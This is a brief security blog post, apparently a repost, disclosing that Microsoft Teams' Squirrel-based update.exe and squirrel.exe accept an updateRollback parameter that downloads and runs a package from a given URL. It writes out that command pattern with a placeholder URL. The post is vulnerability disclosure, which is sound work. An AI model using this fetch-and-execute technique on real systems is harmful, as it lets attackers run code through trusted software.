Update : Nuget/Squirrel uncontrolled endpoints leads to arbitrary code execution
2019-07-02 13:46:02 Author: medium.com(查看原文) 阅读量:506 收藏

Reegun J

Jul 1 · 1 min read

Part 1 : https://medium.com/@reegun/nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-80c9df51cf12

Found another vulnerable parameter where Microsoft Teams do remote download and execute payload.

Vulnerable parameter : %localappdata%/Microsoft/Teams/update.exe — updateRollback=[URL to package] %localappdata%/Microsoft/Teams/current/squirrel.exe — updateRollback=[URL to package]

Note : It is affecting wide usage of squirrel packages, Hope Microsoft Teams will be fixed as soon as possible.


文章来源: https://medium.com/@reegun/update-nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-b55295144b56
如有侵权请联系:admin#unsafe.sh